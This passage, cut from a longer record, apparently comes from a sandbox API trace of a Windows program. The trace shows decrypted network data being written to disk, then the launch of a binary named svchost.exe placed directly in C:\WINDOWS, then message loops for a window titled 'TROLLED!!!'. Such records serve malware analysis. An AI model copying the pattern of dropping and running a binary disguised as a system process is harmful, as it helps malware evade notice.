lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.756] DecryptMessage (in: phContext=0x376c308, pMessage=0x37aa5c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37aa5c8, pfQOP=0x0) returned 0x0 [0087.756] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.757] DecryptMessage (in: phContext=0x376c308, pMessage=0x37aa6dc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37aa6dc, pfQOP=0x0) returned 0x0 [0087.757] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.759] DecryptMessage (in: phContext=0x376c308, pMessage=0x37aa7f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37aa7f0, pfQOP=0x0) returned 0x0 [0087.759] SetEvent (hEvent=0x420) returned 1 [0087.759] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x174f, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x174f, lpOverlapped=0x0) returned 1 [0087.760] CloseHandle (hObject=0x41c) returned 1 [0087.849] SleepEx (dwMilliseconds=0x64, bAlertable=1) returned 0x0 [0088.007] CoTaskMemAlloc (cb=0x20c) returned 0xee5f8 [0088.007] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0xee5f8 | out: pszPath="C:\\WINDOWS") returned 0x0 [0088.007] CoTaskMemFree (pv=0xee5f8) [0088.007] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x105, lpBuffer=0x13fe818, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0088.024] GetProcAddress (hModule=0x772d0000, lpProcName="LocalAlloc") returned 0x772e5b20 [0088.024] GetProcAddress (hModule=0x75760000, lpProcName="ShellExecuteEx") returned 0x75963f70 [0088.025] GetProcAddress (hModule=0x75760000, lpProcName="ShellExecuteExW") returned 0x758c4730 [0088.025] ShellExecuteExW (in: pExecInfo=0x37ab0b4*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\WINDOWS\\svchost.exe", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x37ab0b4*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\WINDOWS\\svchost.exe", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x828)) returned 1 [0095.992] LocalFree (hMem=0x11b880) returned 0x0 [0095.994] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowThreadProcessId") returned 0x750eeb60 [0095.994] GetWindowThreadProcessId (in: hWnd=0x302c8, lpdwProcessId=0x13fedd8 | out: lpdwProcessId=0x13fedd8) returned 0x13dc [0095.995] GetCurrentThreadId () returned 0x13dc [0095.995] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc1a3 [0095.996] GetProcAddress (hModule=0x750c0000, lpProcName="PostMessage") returned 0x0 [0095.996] GetProcAddress (hModule=0x750c0000, lpProcName="PostMessageW") returned 0x750ef870 [0095.996] PostMessageW (hWnd=0x302c8, Msg=0xc1a3, wParam=0x0, lParam=0x0) returned 1 [0095.997] GetWindowTextLengthW (hWnd=0x302c8) returned 10 [0095.997] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0095.997] GetSystemMetrics (nIndex=42) returned 0 [0095.997] GetWindowTextW (in: hWnd=0x302c8, lpString=0x13fed4c, nMaxCount=11 | out: lpString="TROLLED!!!") returned 10 [0095.997] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xd, wParam=0xb, lParam=0x13fed4c) returned 0xa [0096.000] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x46, wParam=0x0, lParam=0x13ff1ec) returned 0x0 [0096.035] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x46, wParam=0x0, lParam=0x13ff1ec) returned 0x0 [0096.035] DefWindowProcW (hWnd=0x6013e, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0096.035] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0096.037] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0096.302] GetProcAddress (hModule=0x753c0000, lpProcName="OleInitialize") returned 0x753f3e50 [0096.302] OleInitialize (pvReserved=0x0) returned 0x0 [0096.302] GetProcAddress (hModule=0x753c0000, lpProcName="CoRegisterMessageFilter") returned 0x753fb200 [0096.302] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x13fef2c | out: lplpMessageFilter=0x13fef2c*=0x0) returned 0x0 [0096.304] GetProcAddress (hModule=0x750c0000, lpProcName="SetFocus") returned 0x750f3d10 [0096.304] SetFocus (hWnd=0x302c8) returned 0x0 [0096.405] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0096.411] GetProcAddress (hModule=0x750c0000, lpProcName="GetKeyboardLayout") returned 0x750f03a0 [0096.413] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0096.414] GetParent (hWnd=0x302c8) returned 0x0 [0096.414] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0096.416] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0096.416] GetWindowPlacement (in: hWnd=0x302c8, lpwndpl=0x13fef18 | out: lpwndpl=0x13fef18) returned 1 [0096.416] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x47, wParam=0x0, lParam=0x13ff1ec) returned 0x0 [0096.416] GetClientRect (in: hWnd=0x302c8, lpRect=0x13feec8 | out: lpRect=0x13feec8) returned 1 [0096.416] GetWindowRect (in: hWnd=0x302c8, lpRect=0x13feec8 | out: lpRect=0x13feec8) returned 1 [0096.417] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x5, wParam=0x0, lParam=0xfc01c7) returned 0x0 [0096.417] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x3, wParam=0x0, lParam=0x53003c) returned 0x0 [0096.417] GetClientRect (in: hWnd=0x302c8, lpRect=0x13feef8 | out: lpRect=0x13feef8) returned 1 [0096.417] GetWindowRect (in: hWnd=0x302c8, lpRect=0x13feef8 | out: lpRect=0x13feef8) returned 1 [0096.418] GetProcAddress (hModule=0x750c0000, lpProcName="PeekMessage") returned 0x0 [0096.418] GetProcAddress (hModule=0x750c0000, lpProcName="PeekMessageW") returned 0x750ed180 [0096.418] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.421] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x46, wParam=0x0, lParam=0x13ff1b4) returned 0x0 [0096.421] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x83, wParam=0x1, lParam=0x13ff18c) returned 0x0 [0096.424] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0096.425] GetWindowPlacement (in: hWnd=0x302c8, lpwndpl=0x13feefc | out: lpwndpl=0x13feefc) returned 1 [0096.425] GetClientRect (in: hWnd=0x302c8, lpRect=0x13feea8 | out: lpRect=0x13feea8) returned 1 [0096.425] GetWindowTextLengthW (hWnd=0x302c8) returned 10 [0096.425] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0096.425] GetSystemMetrics (nIndex=42) returned 0 [0096.425] GetWindowTextW (in: hWnd=0x302c8, lpString=0x13fed68, nMaxCount=11 | out: lpString="TROLLED!!!") returned 10 [0096.425] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xd, wParam=0xb, lParam=0x13fed68) returned 0xa [0096.425] GetClientRect (in: hWnd=0x302c8, lpRect=0x13fedb0 | out: lpRect=0x13fedb0) returned 1 [0096.427] GetProcAddress (hModule=0x750c0000, lpProcName="GetSysColor") returned 0x750efcf0 [0096.427] GetProcAddress (hModule=0x750c0000, lpProcName="GetSysColorW") returned 0x0 [0096.428] GetSysColor (nIndex=10) returned 0xb4b4b4 [0096.428] GetSysColor (nIndex=2) returned 0xd1b499 [0096.428] GetSysColor (nIndex=9) returned 0x0 [0096.428] GetSysColor (nIndex=12) returned 0xababab [0096.428] GetSysColor (nIndex=15) returned 0xf0f0f0 [0096.428] GetSysColor (nIndex=20) returned 0xffffff [0096.428] GetSysColor (nIndex=16) returned 0xa0a0a0 [0096.428] GetSysColor (nIndex=15) returned 0xf0f0f0 [0096.428] GetSysColor (nIndex=16) returned 0xa0a0a0 [0096.428] GetSysColor (nIndex=21) returned 0x696969 [0096.428] GetSysColor (nIndex=22) returned 0xe3e3e3 [0096.428] GetSysColor (nIndex=20) returned 0xffffff [0096.428] GetSysColor (nIndex=18) returned 0x0 [0096.428] GetSysColor (nIndex=1) returned 0x0 [0096.428] GetSysColor (nIndex=27) returned 0xead1b9 [0096.428] GetSysColor (nIndex=28) returned 0xf2e4d7 [0096.428] GetSysColor (nIndex=17) returned 0x6d6d6d [0096.428] GetSysColor (nIndex=13) returned 0xd77800 [0096.428] GetSysColor (nIndex=14) returned 0xffffff [0096.428] GetSysColor (nIndex=26) returned 0xcc6600 [0096.428] GetSysColor (nIndex=11) returned 0xfcf7f4 [0096.428] GetSysColor (nIndex=3) returned 0xdbcdbf [0096.428] GetSysColor (nIndex=19) returned 0x0 [0096.428] GetSysColor (nIndex=24) returned 0xe1ffff [0096.428] GetSysColor (nIndex=23) returned 0x0 [0096.429] GetSysColor (nIndex=4) returned 0xf0f0f0 [0096.429] GetSysColor (nIndex=30) returned 0xf0f0f0 [0096.429] GetSysColor (nIndex=29) returned 0xd77800 [0096.429] GetSysColor (nIndex=7) returned 0x0 [0096.429] GetSysColor (nIndex=0) returned 0xc8c8c8 [0096.429] GetSysColor (nIndex=5) returned 0xffffff [0096.429] GetSysColor (nIndex=6) returned 0x646464 [0096.429] GetSysColor (nIndex=8) returned 0x0 [0096.430] GetSystemMetrics (nIndex=80) returned 1 [0096.432] GetProcAddress (hModule=0x750c0000, lpProcName="EnumDisplayMonitors") returned 0x750f32e0 [0096.436] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0xa60716, dwData=0x0) returned 1 [0096.439] GetProcAddress (hModule=0x750c0000, lpProcName="GetMonitorInfo") returned 0x0 [0096.440] GetProcAddress (hModule=0x750c0000, lpProcName="GetMonitorInfoW") returned 0x750ee1d0 [0096.440] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x13fea10 | out: lpmi=0x13fea10) returned 1 [0096.441] GetProcAddress (hModule=0x74910000, lpProcName="CreateDC") returned 0x0 [0096.441] GetProcAddress (hModule=0x74910000, lpProcName="CreateDCW") returned 0x743c2290 [0096.441] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x4001079b [0096.442] GetProcAddress (hModule=0x74910000, lpProcName="GetDeviceCaps") returned 0x743c0060 [0096.442] GetDeviceCaps (hdc=0x4001079b, index=12) returned 32 [0096.442] GetDeviceCaps (hdc=0x4001079b, index=14) returned 1 [0096.442] DeleteDC (hdc=0x4001079b) returned 1 [0096.443] GetProcAddress (hModule=0x74910000, lpProcName="GetCurrentObject") returned 0x74913480 [0096.443] GetCurrentObject (hdc=0x60100ce, type=0x1) returned 0xb00017 [0096.443] GetCurrentObject (hdc=0x60100ce, type=0x2) returned 0x900010 [0096.443] GetCurrentObject (hdc=0x60100ce, type=0x7) returned 0x310507aa [0096.443] GetCurrentObject (hdc=0x60100ce, type=0x6) returned 0x8a01c2 [0096.443] GetProcAddress (hModule=0x74910000, lpProcName="SaveDC") returned 0x74916610 [0096.443] SaveDC (hdc=0x60100ce) returned 1 [0096.444] GetProcAddress (hModule=0x74910000, lpProcName="GetNearestColor") returned 0x7491afb0 [0096.444] GetNearestColor (hdc=0x60100ce, color=0xf0f0f0) returned 0xf0f0f0 [0096.445] GetProcAddress (hModule=0x74910000, lpProcName="CreateSolidBrush") returned 0x74916860 [0096.445] CreateSolidBrush (color=0xf0f0f0) returned 0x241007c1 [0096.545] GetProcAddress (hModule=0x750c0000, lpProcName="FillRect") returned 0x750d3850 [0096.545] FillRect (hDC=0x60100ce, lprc=0x13fec50, hbr=0x241007c1) returned 1 [0096.546] GetProcAddress (hModule=0x74910000, lpProcName="DeleteObject") returned 0x749152b0 [0096.546] DeleteObject (ho=0x241007c1) returned 1 [0096.546] GetProcAddress (hModule=0x74910000, lpProcName="RestoreDC") returned 0x749165d0 [0096.546] RestoreDC (hdc=0x60100ce, nSavedDC=-1) returned 1 [0096.548] GetWindowPlacement (in: hWnd=0x302c8, lpwndpl=0x13feee0 | out: lpwndpl=0x13feee0) returned 1 [0096.548] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x47, wParam=0x0, lParam=0x13ff1b4) returned 0x0 [0096.548] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x5, wParam=0x0, lParam=0xfc01c7) returned 0x0 [0096.548] GetClientRect (in: hWnd=0x302c8, lpRect=0x13fee90 | out: lpRect=0x13fee90) returned 1 [0096.548] GetWindowRect (in: hWnd=0x302c8, lpRect=0x13fee90 | out: lpRect=0x13fee90) returned 1 [0096.552] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0096.553] GetProcAddress (hModule=0x750c0000, lpProcName="IsWindowUnicode") returned 0x750d9ef0 [0096.553] IsWindowUnicode (hWnd=0x302c8) returned 1 [0096.553] GetProcAddress (hModule=0x750c0000, lpProcName="GetMessageW") returned 0x750efea0 [0096.553] GetMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.554] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff20c) returned 0x0 [0096.555] GetProcAddress (hModule=0x750c0000, lpProcName="TranslateMessage") returned 0x750ef900 [0096.555] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0096.555] GetProcAddress (hModule=0x750c0000, lpProcName="DispatchMessageW") returned 0x750e4840 [0096.555] DispatchMessageW (lpMsg=0x13ff2dc) returned 0x0 [0096.555] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0096.555] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.555] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0096.556] IsWindowUnicode (hWnd=0x302c8) returned 1 [0096.556] GetMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.556] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff20c) returned 0x0 [0096.556] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0096.556] DispatchMessageW (lpMsg=0x13ff2dc) returned 0x0 [0096.556] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.556] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0096.556] IsWindowUnicode (hWnd=0x302c8) returned 1 [0096.556] GetMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.556] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff20c) returned 0x0 [0096.557] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0096.557] DispatchMessageW (lpMsg=0x13ff2dc) returned 0x0 [0096.557] GetProcAddress (hModule=0x750c0000, lpProcName="BeginPaint") returned 0x750f2fb0 [0096.557] BeginPaint (in: hWnd=0x302c8, lpPaint=0x13fed50 | out: lpPaint=0x13fed50) returned 0x10105d6 [0096.557] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0096.559] GetWindowPlacement (in: hWnd=0x302c8, lpwndpl=0x13fea2c | out: lpwndpl=0x13fea2c) returned 1 [0096.559] GetClientRect (in: hWnd=0x302c8, lpRect=0x13fe9d8 | out: lpRect=0x13fe9d8) returned 1 [0096.559] GetWindowTextLengthW (hWnd=0x302c8) returned 10 [0096.559] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0096.559] GetSystemMetrics (nIndex=42) returned 0 [0096.559] GetWindowTextW (in: hWnd=0x302c8, lpString=0x13fe898, nMaxCount=11 | out: lpString="TROLLED!!!") returned 10 [0096.559] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xd, wParam=0xb, lParam=0x13fe898) returned 0xa [0096.559] GetClientRect (in: hWnd=0x302c8, lpRect=0x13fe8e0 | out: lpRect=0x13fe8e0) returned 1 [0096.559] GetCurrentObject (hdc=0x10105d6, type=0x1) returned 0xb00017 [0096.559] GetCurrentObject (hdc=0x10105d6, type=0x2) returned 0x900010 [0096.559] GetCurrentObject (hdc=0x10105d6, type=0x7) returned 0x310507aa [0096.559] GetCurrentObject (hdc=0x10105d6, type=0x6) returned 0x8a01c2 [0096.559] SaveDC (hdc=0x10105d6) returned 1 [0096.559] GetNearestColor (hdc=0x10105d6, color=0xf0f0f0) returned 0xf0f0f0 [0096.559] CreateSolidBrush (color=0xf0f0f0) returned 0x251007c1 [0096.559] FillRect (hDC=0x10105d6, lprc=0x13fe780, hbr=0x251007c1) returned 1 [0096.560] DeleteObject (ho=0x251007c1) returned 1 [0096.560] RestoreDC (hdc=0x10105d6, nSavedDC=-1) returned 1 [0096.561] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipCreateHalftonePalette") returned 0x6fa1a4f0 [0096.561] GdipCreateHalftonePalette () returned 0x290807ac [0096.563] GetProcAddress (hModule=0x74910000, lpProcName="SelectPalette") returned 0x743b86b0 [0096.564] SelectPalette (hdc=0x10105d6, hPal=0x290807ac, bForceBkgd=1) returned 0x88000b [0096.564] GetWindowTextLengthW (hWnd=0x302c8) returned 10 [0096.564] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0096.564] GetSystemMetrics (nIndex=42) returned 0 [0096.564] GetWindowTextW (in: hWnd=0x302c8, lpString=0x13fece0, nMaxCount=11 | out: lpString="TROLLED!!!") returned 10 [0096.564] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xd, wParam=0xb, lParam=0x13fece0) returned 0xa [0096.564] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x290807ac [0096.564] GetProcAddress (hModule=0x750c0000, lpProcName="EndPaint") returned 0x750f32d0 [0096.564] EndPaint (hWnd=0x302c8, lpPaint=0x13fed4c) returned 1 [0096.565] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.565] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0096.565] GetProcAddress (hModule=0x750c0000, lpProcName="GetMessageA") returned 0x750dbdf0 [0096.565] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.565] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0096.565] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0096.566] GetProcAddress (hModule=0x750c0000, lpProcName="DispatchMessageA") returned 0x750dfd80 [0096.566] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0096.566] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0096.566] ResumeThread (hThread=0x260) returned 0x0 [0096.566] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0096.566] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0096.566] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0096.567] GetProcAddress (hModule=0x750c0000, lpProcName="WaitMessage") returned 0x750f4060 [0096.711] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.711] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0096.712] IsWindowUnicode (hWnd=0x70030) returned 1 [0096.712] GetMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0096.712] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff20c) returned 0x0 [0096.712] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0096.712] DispatchMessageW (lpMsg=0x13ff2dc) returned 0x0 [0096.712] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0096.712] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0096.712] WaitMessage () returned 1 [0098.246] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0098.246] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0098.246] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0098.247] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0098.247] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0098.247] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0098.247] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0098.247] ResumeThread (hThread=0x260) returned 0x0 [0098.247] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0098.247] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0098.247] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0098.247] WaitMessage () returned 1 [0101.555] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0101.555] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0101.555] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0101.555] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0101.555] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0101.555] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0101.555] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0101.555] ResumeThread (hThread=0x260) returned 0x0 [0101.555] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0101.556] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0101.556] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0101.556] WaitMessage () returned 1 [0104.852] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0104.852] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0104.852] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0104.852] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0104.852] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0104.852] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0104.852] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0104.852] ResumeThread (hThread=0x260) returned 0x0 [0104.852] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0104.853] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0104.853] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0104.853] WaitMessage () returned 1 [0108.197] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0108.198] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0108.198] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0108.198] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0108.198] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0108.198] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0108.198] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0108.198] ResumeThread (hThread=0x260) returned 0x0 [0108.198] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0108.198] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 